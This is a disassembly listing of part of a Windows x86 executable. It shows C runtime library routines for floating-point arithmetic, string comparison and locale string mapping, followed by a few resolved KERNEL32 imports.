; =============== S U B R O U T I N E =======================================
sub_4215D1 proc near ; CODE XREF: sub_4209FE+73�p
; sub_4209FE+C4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_481600[ecx*4]
lea eax, [eax+eax*8]
lea edx, [ecx+eax*4+4]
mov cl, [edx]
xor eax, eax
mov al, cl
push esi
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_421607
and cl, 7Fh
jmp short loc_421614
; ---------------------------------------------------------------------------
loc_421607: ; CODE XREF: sub_4215D1+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_421623
or cl, 80h
loc_421614: ; CODE XREF: sub_4215D1+34�j
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, esi
mov [edx], cl
pop esi
retn
; ---------------------------------------------------------------------------
loc_421623: ; CODE XREF: sub_4215D1+3E�j
call sub_41B9A5
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_4215D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421633 proc near ; CODE XREF: sub_421131+15D�p
; sub_42186B+6E�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_4], eax
xor eax, eax
xor ecx, ecx
mov cx, [ebx+0Ah]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_18], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov ax, [esi+0Ah]
push edi
mov edi, ecx
mov edx, 7FFFh
and ecx, edx
xor edi, eax
and eax, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_421840
cmp cx, 7FFFh
jnb loc_421840
cmp dx, 0BFFDh
ja loc_421840
cmp dx, 3FBFh
ja short loc_4216A9
xor eax, eax
jmp short loc_4216E3
; ---------------------------------------------------------------------------
loc_4216A9: ; CODE XREF: sub_421633+70�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_4216CB
inc [ebp+arg_0]
xor eax, eax
test [esi+8], edx
jnz short loc_4216CD
cmp [esi+4], eax
jnz short loc_4216CD
cmp [esi], eax
jnz short loc_4216CD
jmp loc_42183A
; ---------------------------------------------------------------------------
loc_4216CB: ; CODE XREF: sub_421633+7E�j
xor eax, eax
loc_4216CD: ; CODE XREF: sub_421633+88�j
; sub_421633+8D�j ...
cmp cx, ax
jnz short loc_4216F0
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_4216F0
cmp [ebx+4], eax
jnz short loc_4216F0
cmp [ebx], eax
jnz short loc_4216F0
loc_4216E3: ; CODE XREF: sub_421633+74�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_42185B
; ---------------------------------------------------------------------------
loc_4216F0: ; CODE XREF: sub_421633+9D�j
; sub_421633+A5�j ...
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
mov [ebp+var_8], eax
mov [ebp+arg_4], 5
loc_421700: ; CODE XREF: sub_421633+12F�j
mov eax, [ebp+var_14]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_421754
add eax, esi
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [ebx+8]
mov [ebp+var_10], ecx
mov [ebp+var_1C], eax
loc_42171C: ; CODE XREF: sub_421633+11F�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
movzx ecx, word ptr [ecx]
movzx eax, word ptr [eax]
imul eax, ecx
mov ecx, [ebp+var_8]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_420B39
add esp, 0Ch
test eax, eax
jz short loc_421747
mov eax, [ebp+var_8]
inc word ptr [eax]
loc_421747: ; CODE XREF: sub_421633+10C�j
add [ebp+var_C], 2
sub [ebp+var_10], 2
dec [ebp+var_1C]
jnz short loc_42171C
loc_421754: ; CODE XREF: sub_421633+D6�j
add [ebp+var_8], 2
inc [ebp+var_14]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_421700
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_421797
loc_421772: ; CODE XREF: sub_421633+15B�j
test byte ptr [ebp+var_20+3], 80h
jnz short loc_421790
lea eax, [ebp+var_28]
push eax
call sub_420BB8
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
pop ecx
jg short loc_421772
loc_421790: ; CODE XREF: sub_421633+143�j
cmp word ptr [ebp+arg_0], 0
jg short loc_4217D0
loc_421797: ; CODE XREF: sub_421633+13D�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_4217D0
mov eax, [ebp+arg_0]
neg eax
movzx ebx, ax
add [ebp+arg_0], ebx
loc_4217B0: ; CODE XREF: sub_421633+191�j
test byte ptr [ebp+var_28], 1
jz short loc_4217B9
inc [ebp+var_18]
loc_4217B9: ; CODE XREF: sub_421633+181�j
lea eax, [ebp+var_28]
push eax
call sub_420BE6
dec ebx
pop ecx
jnz short loc_4217B0
cmp [ebp+var_18], 0
jz short loc_4217D0
or byte ptr [ebp+var_28], 1
loc_4217D0: ; CODE XREF: sub_421633+162�j
; sub_421633+170�j ...
cmp word ptr [ebp+var_28], 8000h
ja short loc_4217E7
mov eax, [ebp+var_28]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_42181C
loc_4217E7: ; CODE XREF: sub_421633+1A3�j
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_421819
and [ebp+var_28+2], 0
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_421814
and [ebp+var_24+2], 0
cmp word ptr [ebp+var_20+2], 0FFFFh
jnz short loc_42180E
inc [ebp+arg_0]
mov word ptr [ebp+var_20+2], 8000h
jmp short loc_42181C
; ---------------------------------------------------------------------------
loc_42180E: ; CODE XREF: sub_421633+1CE�j
inc word ptr [ebp+var_20+2]
jmp short loc_42181C
; ---------------------------------------------------------------------------
loc_421814: ; CODE XREF: sub_421633+1C2�j
inc [ebp+var_24+2]
jmp short loc_42181C
; ---------------------------------------------------------------------------
loc_421819: ; CODE XREF: sub_421633+1B8�j
inc [ebp+var_28+2]
loc_42181C: ; CODE XREF: sub_421633+1B2�j
; sub_421633+1D9�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_421840
mov cx, word ptr [ebp+var_28+2]
mov [esi], cx
mov ecx, [ebp+var_24]
mov [esi+2], ecx
mov ecx, [ebp+var_20]
mov [esi+6], ecx
or eax, edi
loc_42183A: ; CODE XREF: sub_421633+93�j
mov [esi+0Ah], ax
jmp short loc_42185B
; ---------------------------------------------------------------------------
loc_421840: ; CODE XREF: sub_421633+4F�j
; sub_421633+5A�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_42185B: ; CODE XREF: sub_421633+B8�j
; sub_421633+20B�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41C596
leave
retn
sub_421633 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42186B proc near ; CODE XREF: sub_420CF7+39F�p
; sub_421131+144�p
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
mov ebx, offset dword_432F20
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
mov [ebp+var_4], eax
jz short loc_4218E9
jge short loc_421899
neg [ebp+arg_4]
mov ebx, offset dword_433080
sub ebx, 60h
loc_421899: ; CODE XREF: sub_42186B+21�j
cmp [ebp+arg_8], ecx
jnz short loc_4218A4
mov eax, [ebp+arg_0]
mov [eax], cx
loc_4218A4: ; CODE XREF: sub_42186B+31�j
cmp [ebp+arg_4], ecx
jz short loc_4218E9
push esi
push edi
loc_4218AB: ; CODE XREF: sub_42186B+7A�j
mov eax, [ebp+arg_4]
sar [ebp+arg_4], 3
and eax, 7
add ebx, 54h
cmp eax, ecx
jz short loc_4218E2
lea eax, [eax+eax*2]
lea esi, [ebx+eax*4]
cmp word ptr [esi], 8000h
jb short loc_4218D5
lea edi, [ebp+var_10]
movsd
movsd
movsd
dec [ebp+var_E]
lea esi, [ebp+var_10]
loc_4218D5: ; CODE XREF: sub_42186B+5C�j
push esi
push [ebp+arg_0]
call sub_421633
pop ecx
pop ecx
xor ecx, ecx
loc_4218E2: ; CODE XREF: sub_42186B+4F�j
cmp [ebp+arg_4], ecx
jnz short loc_4218AB
pop edi
pop esi
loc_4218E9: ; CODE XREF: sub_42186B+1F�j
; sub_42186B+3C�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop ebx
call sub_41C596
leave
retn
sub_42186B endp
; =============== S U B R O U T I N E =======================================
sub_4218F7 proc near ; CODE XREF: sub_4071CF+31�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_42191E
push esi
call sub_419D70
inc eax
push eax
call sub_416E1F
test eax, eax
pop ecx
pop ecx
jz short loc_42191E
push esi
push eax
call sub_41BFE0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_42191E: ; CODE XREF: sub_4218F7+7�j
; sub_4218F7+1A�j
xor eax, eax
pop esi
retn
sub_4218F7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421930 proc near ; CODE XREF: sub_4042A2+14A�p
jmp dword_4221F4
sub_421930 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421936 proc near ; CODE XREF: sub_417A31+24�p
; sub_417D60+13�p
jmp dword_422164
sub_421936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42193C proc near ; CODE XREF: sub_4039DB+DA�p
; sub_4039DB+F1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
call sub_4191CF
mov ecx, [eax+64h]
cmp ecx, off_4323FC
mov [ebp+var_4], ecx
jz short loc_42195D
call sub_419FFE
mov [ebp+var_4], eax
mov ecx, eax
loc_42195D: ; CODE XREF: sub_42193C+15�j
cmp dword ptr [ecx+14h], 0
push ebx
jnz short loc_4219A2
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
loc_42196A: ; CODE XREF: sub_42193C+62�j
xor ebx, ebx
mov bx, [ecx]
cmp bx, 41h
jb short loc_42197E
cmp bx, 5Ah
ja short loc_42197E
add ebx, 20h
loc_42197E: ; CODE XREF: sub_42193C+37�j
; sub_42193C+3D�j
xor eax, eax
mov ax, [edx]
cmp ax, 41h
jb short loc_421992
cmp ax, 5Ah
ja short loc_421992
add eax, 20h
loc_421992: ; CODE XREF: sub_42193C+4B�j
; sub_42193C+51�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_4219DE
cmp bx, ax
jz short loc_42196A
jmp short loc_4219DE
; ---------------------------------------------------------------------------
loc_4219A2: ; CODE XREF: sub_42193C+26�j
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
jmp short loc_4219AF
; ---------------------------------------------------------------------------
loc_4219AC: ; CODE XREF: sub_42193C+9E�j
mov ecx, [ebp+var_4]
loc_4219AF: ; CODE XREF: sub_42193C+6E�j
xor eax, eax
mov ax, [esi]
push eax
push ecx
call sub_4219E9
inc esi
inc esi
mov ebx, eax
xor eax, eax
mov ax, [edi]
push eax
push [ebp+var_4]
call sub_4219E9
add esp, 10h
inc edi
inc edi
test bx, bx
jz short loc_4219DC
cmp bx, ax
jz short loc_4219AC
loc_4219DC: ; CODE XREF: sub_42193C+99�j
pop edi
pop esi
loc_4219DE: ; CODE XREF: sub_42193C+5D�j
; sub_42193C+64�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
leave
retn
sub_42193C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219E9 proc near ; CODE XREF: sub_42193C+7A�p
; sub_42193C+8C�p
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, 0FFFFh
cmp word ptr [ebp+arg_4], ax
jz short locret_421A48
cmp word ptr [ebp+arg_4], 100h
push esi
mov esi, [ebp+arg_0]
jnb short loc_421A1C
push 1
push [ebp+arg_4]
push esi
call sub_421CA3
add esp, 0Ch
test eax, eax
jnz short loc_421A1C
mov ax, word ptr [ebp+arg_4]
jmp short loc_421A47
; ---------------------------------------------------------------------------
loc_421A1C: ; CODE XREF: sub_4219E9+19�j
; sub_4219E9+2B�j
push dword ptr [esi+4]
lea eax, [ebp+var_4]
push 1
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push 100h
push dword ptr [esi+14h]
call sub_421A4A
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_4]
jz short loc_421A47
mov ax, [ebp+var_4]
loc_421A47: ; CODE XREF: sub_4219E9+31�j
; sub_4219E9+58�j
pop esi
locret_421A48: ; CODE XREF: sub_4219E9+D�j
leave
retn
sub_4219E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421A4A proc near ; CODE XREF: sub_4219E9+4A�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 24h
push offset stru_42CE18
call __SEH_prolog
xor ebx, ebx
xor edi, edi
inc edi
cmp dword_4815DC, ebx
jnz short loc_421A98
push ebx
push ebx
push edi
push offset dword_42C148
push 100h
push ebx
call dword_4221A8 ; LCMapStringW
test eax, eax
jz short loc_421A83
mov dword_4815DC, edi
jmp short loc_421A98
; ---------------------------------------------------------------------------
loc_421A83: ; CODE XREF: sub_421A4A+2F�j
call dword_422008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_421A98
mov dword_4815DC, 2
loc_421A98: ; CODE XREF: sub_421A4A+17�j
; sub_421A4A+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_421ABA
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_421AA3: ; CODE XREF: sub_421A4A+63�j
dec ecx
cmp [eax], bx
jz short loc_421AB2
inc eax
inc eax
cmp ecx, ebx
jnz short loc_421AA3
or ecx, 0FFFFFFFFh
loc_421AB2: ; CODE XREF: sub_421A4A+5D�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_421ABA: ; CODE XREF: sub_421A4A+51�j
mov eax, dword_4815DC
cmp eax, edi
jnz short loc_421AE0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A8 ; LCMapStringW
jmp loc_421C9A
; ---------------------------------------------------------------------------
loc_421AE0: ; CODE XREF: sub_421A4A+77�j
cmp eax, 2
jz short loc_421AE9
cmp eax, ebx
jnz short loc_421B3D
loc_421AE9: ; CODE XREF: sub_421A4A+99�j
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_0], ebx
jnz short loc_421AFF
mov eax, dword_481498
mov [ebp+arg_0], eax
loc_421AFF: ; CODE XREF: sub_421A4A+AB�j
cmp [ebp+arg_18], ebx
jnz short loc_421B0C
mov eax, dword_4814A8
mov [ebp+arg_18], eax
loc_421B0C: ; CODE XREF: sub_421A4A+B8�j
push [ebp+arg_0]
call sub_4202EF
pop ecx
cmp [ebp+arg_18], eax
jz short loc_421B22
cmp eax, 0FFFFFFFFh
jz short loc_421B22
mov [ebp+arg_18], eax
loc_421B22: ; CODE XREF: sub_421A4A+CE�j
; sub_421A4A+D3�j
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push [ebp+arg_18]
call dword_4220D8 ; WideCharToMultiByte
mov [ebp+var_28], eax
cmp eax, ebx
jnz short loc_421B44
loc_421B3D: ; CODE XREF: sub_421A4A+9D�j
; sub_421A4A+141�j
xor eax, eax
jmp loc_421C9A
; ---------------------------------------------------------------------------
loc_421B44: ; CODE XREF: sub_421A4A+F1�j
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_421B78
; ---------------------------------------------------------------------------
loc_421B60: ; DATA XREF: .text:stru_42CE18�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_421B64: ; DATA XREF: .text:stru_42CE18�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
loc_421B78: ; CODE XREF: sub_421A4A+114�j
cmp [ebp+var_2C], ebx
jnz short loc_421B90
push [ebp+var_28]
call sub_416E1F
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz short loc_421B3D
mov [ebp+var_20], edi
loc_421B90: ; CODE XREF: sub_421A4A+131�j
push ebx
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push [ebp+arg_18]
call dword_4220D8 ; WideCharToMultiByte
test eax, eax
jz loc_421C7A
push ebx
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz loc_421C7A
mov [ebp+ms_exc.disabled], edi
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_34], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_421C04
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_30]
loc_421C04: ; CODE XREF: sub_421A4A+1A1�j
cmp edi, ebx
jnz short loc_421C1C
push esi
call sub_416E1F
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_421C7D
mov [ebp+var_24], 1
loc_421C1C: ; CODE XREF: sub_421A4A+1BC�j
push esi
push edi
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
test eax, eax
jz short loc_421C7D
test byte ptr [ebp+arg_4+1], 4
jz short loc_421C59
mov [ebp+var_1C], esi
cmp [ebp+arg_14], ebx
jz short loc_421C7D
cmp [ebp+arg_14], esi
jge short loc_421C4A
mov esi, [ebp+arg_14]
loc_421C4A: ; CODE XREF: sub_421A4A+1FB�j
push esi
push edi
push [ebp+arg_10]
call sub_416A00
add esp, 0Ch
jmp short loc_421C7D
; ---------------------------------------------------------------------------
loc_421C59: ; CODE XREF: sub_421A4A+1EE�j
cmp [ebp+arg_14], ebx
jnz short loc_421C62
push ebx
push ebx
jmp short loc_421C68
; ---------------------------------------------------------------------------
loc_421C62: ; CODE XREF: sub_421A4A+212�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_421C68: ; CODE XREF: sub_421A4A+216�j
push esi
push edi
push 1
push [ebp+arg_18]
call dword_4220D4 ; MultiByteToWideChar
mov [ebp+var_1C], eax
jmp short loc_421C7D
; ---------------------------------------------------------------------------
loc_421C7A: ; CODE XREF: sub_421A4A+160�j
; sub_421A4A+181�j
mov edi, [ebp+var_34]
loc_421C7D: ; CODE XREF: sub_421A4A+1C9�j
; sub_421A4A+1E8�j ...
cmp [ebp+var_24], ebx
jz short loc_421C89
push edi
call sub_416D07
pop ecx
loc_421C89: ; CODE XREF: sub_421A4A+236�j
cmp [ebp+var_20], ebx
jz short loc_421C97
push [ebp+var_2C]
call sub_416D07
pop ecx
loc_421C97: ; CODE XREF: sub_421A4A+242�j
mov eax, [ebp+var_1C]
loc_421C9A: ; CODE XREF: sub_421A4A+91�j
; sub_421A4A+F5�j
lea esp, [ebp-40h]
call __SEH_epilog
retn
sub_421A4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421CA3 proc near ; CODE XREF: sub_4219E9+21�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0FFFFh
jz short loc_421CE8
cmp [ebp+arg_4], 100h
jnb short loc_421CC7
movzx eax, [ebp+arg_4]
mov ecx, off_432A64
mov ax, [ecx+eax*2]
jmp short loc_421CEF
; ---------------------------------------------------------------------------
loc_421CC7: ; CODE XREF: sub_421CA3+12�j
mov eax, [ebp+arg_0]
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push 1
call sub_421CFA
add esp, 18h
test eax, eax
jnz short loc_421CEC
loc_421CE8: ; CODE XREF: sub_421CA3+A�j
xor eax, eax
jmp short loc_421CEF
; ---------------------------------------------------------------------------
loc_421CEC: ; CODE XREF: sub_421CA3+43�j
mov eax, [ebp+var_4]
loc_421CEF: ; CODE XREF: sub_421CA3+22�j
; sub_421CA3+47�j
movzx ecx, [ebp+arg_8]
movzx eax, ax
and eax, ecx
leave
retn
sub_421CA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421CFA proc near ; CODE XREF: sub_421CA3+39�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 24h
push offset stru_42CE30
call __SEH_prolog
xor esi, esi
xor edi, edi
inc edi
cmp dword_4815E0, esi
jnz short loc_421D45
lea eax, [ebp+var_1C]
push eax
push edi
push offset dword_42C148
push edi
call dword_422158 ; GetStringTypeW
test eax, eax
jz short loc_421D30
mov dword_4815E0, edi
jmp short loc_421D45
; ---------------------------------------------------------------------------
loc_421D30: ; CODE XREF: sub_421CFA+2C�j
call dword_422008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_421D45
mov dword_4815E0, 2
loc_421D45: ; CODE XREF: sub_421CFA+17�j
; sub_421CFA+34�j ...
mov eax, dword_4815E0
cmp eax, edi
jnz short loc_421D65
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_422158 ; GetStringTypeW
jmp loc_421F16
; ---------------------------------------------------------------------------
loc_421D65: ; CODE XREF: sub_421CFA+52�j
cmp eax, 2
jz short loc_421D6E
cmp eax, esi
jnz short loc_421DC1
loc_421D6E: ; CODE XREF: sub_421CFA+6E�j
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_14], esi
jnz short loc_421D81
mov eax, dword_481498
mov [ebp+arg_14], eax
loc_421D81: ; CODE XREF: sub_421CFA+7D�j
cmp [ebp+arg_10], esi
jnz short loc_421D8E
mov eax, dword_4814A8
mov [ebp+arg_10], eax
loc_421D8E: ; CODE XREF: sub_421CFA+8A�j
push [ebp+arg_14]
call sub_4202EF
pop ecx
cmp [ebp+arg_10], eax
jz short loc_421DA4
cmp eax, 0FFFFFFFFh
jz short loc_421DA4
mov [ebp+arg_10], eax
loc_421DA4: ; CODE XREF: sub_421CFA+A0�j
; sub_421CFA+A5�j
push esi
push esi
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push esi
push [ebp+arg_10]
call dword_4220D8 ; WideCharToMultiByte
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, esi
jnz short loc_421DC8
loc_421DC1: ; CODE XREF: sub_421CFA+72�j
; sub_421CFA+126�j
xor eax, eax
jmp loc_421F16
; ---------------------------------------------------------------------------
loc_421DC8: ; CODE XREF: sub_421CFA+C5�j
mov [ebp+ms_exc.disabled], esi
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
push ebx
push esi
push eax
call sub_41E8F0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_421E0D
; ---------------------------------------------------------------------------
loc_421DF1: ; DATA XREF: .text:stru_42CE30�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_421DF5: ; DATA XREF: .text:stru_42CE30�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
and [ebp+var_2C], 0
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
mov ebx, [ebp+var_28]
xor esi, esi
loc_421E0D: ; CODE XREF: sub_421CFA+F5�j
cmp [ebp+var_2C], esi
jnz short loc_421E25
push ebx
push edi
call sub_41E61E
pop ecx
pop ecx
mov [ebp+var_2C], eax
cmp eax, esi
jz short loc_421DC1
mov [ebp+var_20], edi
loc_421E25: ; CODE XREF: sub_421CFA+116�j
push esi
push esi
push ebx
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
push [ebp+arg_10]
call dword_4220D8 ; WideCharToMultiByte
test eax, eax
jz loc_421F05
mov [ebp+ms_exc.disabled], edi
lea eax, [ebx+ebx+2]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_421E7F
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
and [ebp+var_30], 0
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
mov ebx, [ebp+var_28]
xor esi, esi
loc_421E7F: ; CODE XREF: sub_421CFA+167�j
cmp [ebp+var_30], esi
jnz short loc_421E99
lea eax, [ebx+ebx+2]
push eax
call sub_416E1F
pop ecx
mov [ebp+var_30], eax
cmp eax, esi
jz short loc_421F05
mov [ebp+var_24], edi
loc_421E99: ; CODE XREF: sub_421CFA+188�j
cmp [ebp+arg_14], esi
jnz short loc_421EA6
mov eax, dword_481498
mov [ebp+arg_14], eax
loc_421EA6: ; CODE XREF: sub_421CFA+1A2�j
mov edi, [ebp+arg_8]
add edi, edi
mov eax, [ebp+var_30]
lea esi, [edi+eax]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push eax
push ebx
push [ebp+var_2C]
push [ebp+arg_0]
push [ebp+arg_14]
call dword_4221D8 ; GetStringTypeA
mov [ebp+var_34], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_421EF0
cmp word ptr [esi], 0FFFFh
jnz short loc_421EF0
push edi
push [ebp+var_30]
push [ebp+arg_C]
call sub_41F060
add esp, 0Ch
jmp short loc_421EF4
; ---------------------------------------------------------------------------
loc_421EF0: ; CODE XREF: sub_421CFA+1DC�j
; sub_421CFA+1E3�j
and [ebp+var_34], 0
loc_421EF4: ; CODE XREF: sub_421CFA+1F4�j
cmp [ebp+var_24], 0
jz short loc_421F03
push [ebp+var_30]
call sub_416D07
pop ecx
loc_421F03: ; CODE XREF: sub_421CFA+1FE�j
xor esi, esi
loc_421F05: ; CODE XREF: sub_421CFA+143�j
; sub_421CFA+19A�j
cmp [ebp+var_20], esi
jz short loc_421F13
push [ebp+var_2C]
call sub_416D07
pop ecx
loc_421F13: ; CODE XREF: sub_421CFA+20E�j
mov eax, [ebp+var_34]
loc_421F16: ; CODE XREF: sub_421CFA+66�j
; sub_421CFA+C9�j
lea esp, [ebp-40h]
call __SEH_epilog
retn
sub_421CFA endp
; ---------------------------------------------------------------------------
mov eax, dword_43A7E8
and eax, 0FFFFFFFEh
mov dword_43A7E8, eax
retn
; ---------------------------------------------------------------------------
loc_421F2D: ; DATA XREF: sub_407BA7�o
mov eax, offset dword_42CE60
jmp loc_417A83
; ---------------------------------------------------------------------------
align 4
dd 32h dup(0)
dword_422000 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401141+285�r ...
dword_422004 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_40195E+32�r ...
